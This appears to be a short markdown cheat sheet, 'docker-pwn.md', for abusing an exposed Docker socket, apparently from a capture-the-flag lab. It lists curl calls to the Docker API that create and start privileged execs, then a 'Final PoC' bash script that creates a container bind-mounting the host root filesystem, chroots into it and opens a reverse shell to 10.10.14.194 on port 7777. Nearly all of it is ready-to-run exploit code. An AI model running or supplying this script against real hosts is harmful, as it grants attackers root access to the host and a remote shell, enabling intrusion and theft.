docker-pwn.md

#Get all containers or images: curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/json #Create a new container curl -i -s --unix-socket /var/run/docker.sock -X POST \ -H "Content-Type: application/json" \ --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["bash", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \ http://localhost/containers/container_id/exec #Start the newer container with the command curl -i -s --unix-socket /var/run/docker.sock -X POST \ -H 'Content-Type: application/json' \ --data-binary '{"Detach": false,"Tty": false}' \ http://localhost/exec/exec_id/start

Final PoC:

#!/bin/bash pay="bash -c 'bash -i >& /dev/tcp/10.10.14.194/7777 0>&1'" payload="["/bin/sh","-c","chroot /mnt sh -c \"$pay\""]" response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{"Image":"sandbox","cmd":$payload, "Binds": ["/:/mnt:rw"]}" -H 'Content-Type: application/json' http://localhost/containers/create) revShellContainerID=$(echo "$response" | cut -d'"' -f4) curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start sleep 1 curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"